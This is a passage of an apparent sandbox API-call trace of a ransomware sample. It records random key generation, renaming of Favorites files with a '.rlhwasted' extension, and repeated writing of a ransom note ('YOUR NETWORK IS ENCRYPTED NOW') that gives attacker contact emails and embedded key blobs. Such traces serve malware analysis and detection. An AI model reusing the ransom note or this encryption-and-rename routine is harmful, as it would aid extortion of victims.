dwLen=0x1b8, pbBuffer=0x6efac8 | out: pbBuffer=0x6efac8) returned 1 [0198.684] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0198.684] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f4f10) returned 1 [0198.685] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0198.685] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0198.737] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6e8978 [0198.738] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6efa80 | out: hHeap=0x6b0000) returned 1 [0198.738] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6e7988 [0198.738] _snwprintf (in: _Dest=0x6e7988, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]QFdhXdihrMxPONiy62f8ikAH3ovbXQc5Qx+ia0R5F42oMwzbnC17ZCjGbi1EXSCj\r\n4G903Fu4x+p0ucGQIrOP+u3zNX+0h/B2VzU3lJ9sbT7mvDjf7hndwlD33cgaIixx\r\noVltDZK7X4Ntx2YwhXMFxv1hBzEvKLWYslG+m1J/SppctYq4vGEXdNMzuhVUEw/X\r\nSNNHnivMU6TtjbXl5feAA2cAOfDUCm0EhfV3TrqpEsy8hyR6tL46wm4DgsI1dd85\r\nk2RTq75x8v+vh42RFizlxYqo38uuw5lXHGlZyqheM5EhMZCJCTVA1pwf7NRpEq9e\r\nvBVLeMjbVkzgTJOtkgPTj6Xp2yIwYYCH5jdVYvK9Z73wprESPbR2I5fxubfT0+Vl\r\nWaHryZPE6UCKucgg/ZMgyOqdKkFewbFHBXMtTCK5yYj8YkRUOt8OOZwvBFG6GwlZ\r\nzvCYUOSYTc5MzoPZPFvGEtePJ/msVaIZB4MqPc/n86Lrx5FHN/AHzFGg9YmXxvzJ\r\nLVKmAjzN0pSR/iJO2l84Rwt5szUaGVwDaVG52HdI+jKawHTcumcX6+c/N2ciwygg\r\njsBe7FTX5JQLMemSBmvsJTBjtV4z8UWMymz3ZVo85l37rIsI9pQtMS+6LY0ZrazJ\r\nywlZUgsVsAYDHroRU8l7AhkGz++xm7xV40IxXXU305w=[end_key]\r\nKEEP IT\r\n") returned 981 [0198.738] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8978 | out: hHeap=0x6b0000) returned 1 [0198.738] WriteFile (in: hFile=0x108, lpBuffer=0x6e7988*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x12afef8, lpOverlapped=0x0 | out: lpBuffer=0x6e7988*, lpNumberOfBytesWritten=0x12afef8*=0x7aa, lpOverlapped=0x0) returned 1 [0198.738] SetEndOfFile (hFile=0x108) returned 1 [0198.741] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7988 | out: hHeap=0x6b0000) returned 1 [0198.741] CloseHandle (hObject=0x108) returned 1 [0198.742] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x707f58 | out: hHeap=0x6b0000) returned 1 [0198.743] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x716f10 | out: hHeap=0x6b0000) returned 1 [0198.743] _aulldvrm () returned 0x0 [0198.743] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f4f10) returned 1 [0198.744] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0198.745] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0198.745] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url") returned 58 [0198.745] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x27e) returned 0x707f58 [0198.745] lstrcpyW (in: lpString1=0x707fcc, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0198.745] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6e7988 [0198.745] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f4f10) returned 1 [0198.746] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x6e7988 | out: pbBuffer=0x6e7988) returned 1 [0198.746] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0198.746] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url.rlhwasted_info" (normalized: "c:\\users\\default\\favorites\\links\\web slice gallery.url.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0198.746] WriteFile (in: hFile=0x108, lpBuffer=0x6e7988*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6e7988*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0198.747] SetEndOfFile (hFile=0x108) returned 1 [0198.747] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0198.747] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7988 | out: hHeap=0x6b0000) returned 1 [0198.748] lstrcpyW (in: lpString1=0x707fcc, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0198.748] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\default\\favorites\\links\\web slice gallery.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url.rlhwasted" (normalized: "c:\\users\\default\\favorites\\links\\web slice gallery.url.rlhwasted")) returned 1 [0198.748] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url.rlhwasted" (normalized: "c:\\users\\default\\favorites\\links\\web slice gallery.url.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0198.749] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x128 [0198.749] GetFileSize (in: hFile=0x10c, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0xe2 [0198.749] MapViewOfFile (hFileMappingObject=0x128, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe2) returned 0x6a0000 [0198.749] CloseHandle (hObject=0x10c) returned 1 [0198.750] UnmapViewOfFile (lpBaseAddress=0x6a0000) returned 1 [0198.750] CloseHandle (hObject=0x128) returned 1 [0198.750] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6efa80 [0198.750] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x710fe8) returned 1 [0198.751] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x1b8, pbBuffer=0x6efac8 | out: pbBuffer=0x6efac8) returned 1 [0198.751] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0198.751] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x710fe8) returned 1 [0198.752] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0198.752] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0198.761] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6e8978 [0198.761] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6efa80 | out: hHeap=0x6b0000) returned 1 [0198.761] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6e7988 [0198.761] _snwprintf (in: _Dest=0x6e7988, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]UE8ysyzwcG5CcyKFNBLM6J1v0/Qo4P+w65sCaLk4XqqnTeLRRgQf2Mu/RLXp5TRX\r\nPhMv2ym4Zm3o8TYq/bXhZf8CFlkBUbwF/hekaIyrTXSjHH1w/qiZXAJCJqH4S9mI\r\nVj1Bh5u2XOEsU4KTNS9S1VZ0qIbQgrEYBPHBeUcPaWq3YeD9xKNKQUGDsT+2vcK3\r\n7u+I2BkLRboylugPw4rTQ3+Io/h1Zhd4wmr4/DP/QDdOMY7q2tlKlMouJ0EuK65G\r\nr68WvqxVTt956qby9W4Ln5OXhLTlgdmEQ5+V6OF0XVOKvTx8OpZ1n3c8mlspOZ7v\r\nMCy+310s/YYlh+II0IWcl352wCYnjvVQuDw3oF+FmXtVNuwbsYtQiSXR5izI/xrI\r\nMf41NMAOr1urGJ+0LtGjYlHgmmrBNfU4lmeo6rJwbhThi1GVgaEDjkoB5RCuMsb0\r\nMWgveih6UsvFp3us0cBxnz3TS/HS0UfWrP3wK5hcSIihucS0mKUe4VMkdzGlUebS\r\nxWSWon3ZNdu95bQ4Ca7fiRUzG37IGMtfRGJ5kVMbGNCGe448J+q/GPRZd7F1z4SH\r\nfO+1/zT763YWd/YWwZS8uvES8tyYTR98tHf6xRd0ZT77zO+CUSkd5Q6H4O5exOxQ\r\n67lf5DJgFlUO0MCMH8h4viHmieFe5iEjf+wW1W/Khz3=[end_key]\r\nKEEP IT\r\n") returned 981 [0198.761] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8978 | out: hHeap=0x6b0000) returned 1 [0198.761] WriteFile (in: hFile=0x108, lpBuffer=0x6e7988*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x12afef8, lpOverlapped=0x0 | out: lpBuffer=0x6e7988*, lpNumberOfBytesWritten=0x12afef8*=0x7aa, lpOverlapped=0x0) returned 1 [0198.761] SetEndOfFile (hFile=0x108) returned 1 [0198.763] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7988 | out: hHeap=0x6b0000) returned 1 [0198.763] CloseHandle (hObject=0x108) returned 1 [0198.765] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x707f58 | out: hHeap=0x6b0000) returned 1 [0198.765] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x706450 | out: hHeap=0x6b0000) returned 1 [0198.765] _aulldvrm () returned 0x0 [0198.765] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x710fe8) returned 1 [0198.766] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0198.766] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0198.766] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url") returned 68 [0198.766] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x292) returned 0x6d4580 [0198.766] lstrcpyW (in: lpString1=0x6d4608, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0198.766] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6e7988 [0198.766] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x710fe8) returned 1 [0198.767] CryptGenRandom (in: hProv=0x710fe8, dwLen=0xa34, pbBuffer=0x6e7988 | out: pbBuffer=0x6e7988) returned 1 [0198.767] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0198.767] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url.rlhwasted_info" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie add-on site.url.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0198.768] WriteFile (in: hFile=0x108, lpBuffer=0x6e7988*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6e7988*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0198.780] SetEndOfFile (hFile=0x108) returned 1 [0198.780] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0198.780] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7988 | out: hHeap=0x6b0000) returned 1 [0198.780] lstrcpyW (in: lpString1=0x6d4608, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0198.781] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie add-on site.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url.rlhwasted" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie add-on site.url.rlhwasted")) returned 1 [0198.817] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url.rlhwasted" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie add-on site.url.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0198.818] CreateFileMappingW (hFile=0x128, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0198.818] GetFileSize (in: hFile=0x128, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x85 [0198.818] MapViewOfFile (hFileMappingObject=0x10c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x85) returned 0x6a0000 [0198.818] CloseHandle (hObject=0x128) returned 1 [0198.819] UnmapViewOfFile (lpBaseAddress=0x6a0000) returned 1 [0198.819] CloseHandle (hObject=0x10c) returned 1 [0198.820] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x707f58 [0198.820] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x710fe8) returned 1 [0198.820] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x1b8, pbBuffer=0x707fa0 | out: pbBuffer=0x707fa0) returned 1 [0198.820] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0198.820] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x710fe8) returned 1 [0198.821] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0198.821] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0198.830] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6e8978 [0198.830] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x707f58 | out: hHeap=0x6b0000) returned 1 [0198.830] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6e7988 [0198.830] _snwprintf (in: _Dest=0x6e7988, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]U9O6UKfhMTCSIh1gQw+uvqztasv2nGr3rfWk/R/I/beevyEcjMgOzNBvqDErqbAr\r\nEmeYC0+uTWLWh5exezpnBzqBmSwKPDWq8ZlxHso2z4Xbp8fqcEJTYojd7j3Bc53i\r\nfDJyX59TUAv6m7E6zj+Wo0U0uLXm1f7pSkhv/h2dicmsGHEpIplTYAUvFCGWD/PB\r\ney+cnlCOvIQl5Su6kglRtJ5RYTFwcZ8WQYHNR3+g1puqIeaMOVQdz9jSEkV0cfeM\r\nUiVRNUtbzUolzgVJpinqjOP4DNudFTkcbN7xfD//JNzl9c/zi8qLd2IJmLcPFeL9\r\nPl31vCZvMVpF3LNleU1RXnNJ9EiTsiAcWWHTbmrvB1eSDnrHIcNJwfBRl0dVpitN\r\noVeGrU0R2sLJeDed50GmF10gcB+5e28fkM3Q1r7vpFW7gA+f3tCFFStF+BeLfGWn\r\n7hR7/+yviRVSpYGbYs0Z/ABOi96KfdocbyGVxP9MwZ8G9OddqAQBCbXDBtk5qScC\r\nIamlE24FfouEckRB0/HluzlQ5Vk80VNBydnnIfs9kkMCLk92JHgsKUCzT/26DHR4\r\nBaI06FOsMnJFC1/lPNh8E3rS/aj03/FXYtmjlwFfFjRlgKslwUfrsiluY3X8FaKT\r\np1WAu+rNZBXGiRJ/W6q230aYaz9cgXi4Zwi2VB7VDPf=[end_key]\r\nKEEP IT\r\n") returned 981 [0198.830] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8978 | out: hHeap=0x6b0000) returned 1 [0198.830] WriteFile (in: hFile=0x108, lpBuffer=0x6e7988*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x12afef8, lpOverlapped=0x0 | out: lpBuffer=0x6e7988*, lpNumberOfBytesWritten=0x12afef8*=0x7aa, lpOverlapped=0x0) returned 1 [0198.830] SetEndOfFile (hFile=0x108) returned 1 [0198.833] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7988 | out: hHeap=0x6b0000) returned 1 [0198.833] CloseHandle (hObject=0x108) returned 1 [0198.836] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0198.836] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x70b470 | out: hHeap=0x6b0000) returned 1 [0198.836] _aulldvrm () returned 0x0 [0198.836] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x710fe8) returned 1 [0198.837] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0198.837] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0198.837] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url") returned 71 [0198.837] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x298) returned 0x6d4580 [0198.837] lstrcpyW (in: lpString1=0x6d460e, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0198.838] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6e7988 [0198.838] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x710fe8) returned 1 [0198.838] CryptGenRandom (in: hProv=0x710fe8, dwLen=0xa34, pbBuffer=0x6e7988 | out: pbBuffer=0x6e7988) returned 1 [0198.838] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0198.838] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url.rlhwasted_info" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at work.url.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0198.839] WriteFile (in: hFile=0x108, lpBuffer=0x6e7988*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6e7988*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0198.840] SetEndOfFile (hFile=0x108) returned 1 [0198.840] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0198.840] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7988 | out: hHeap=0x6b0000) returned 1 [0198.840] lstrcpyW (in: lpString1=0x6d460e, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0198.840] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at work.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url.rlhwasted" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at work.url.rlhwasted")) returned 1 [0198.841] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url.rlhwasted" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at work.url.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0198.841] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x128 [0198.842] GetFileSize (in: hFile=0x10c, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x85 [0198.842] MapViewOfFile (hFileMappingObject=0x128, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x85) returned 0x6a0000 [0198.842] CloseHandle (hObject=0x10c) returned 1 [0198.843] UnmapViewOfFile (lpBaseAddress=0x6a0000) returned 1 [0198.843] CloseHandle (hObject=0x128) returned 1 [0198.843] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x707f58 [0198.843] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x710fe8) returned 1 [0198.844] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x1b8, pbBuffer=0x707fa0 | out: pbBuffer=0x707fa0) returned 1 [0198.844] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0198.844] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x710fe8) returned 1 [0198.845] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0198.845] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0198.865] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6e8978 [0198.865] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x707f58 | out: hHeap=0x6b0000) returned 1 [0198.865] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6e7988 [0198.865] _snwprintf (in: _Dest=0x6e7988, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING 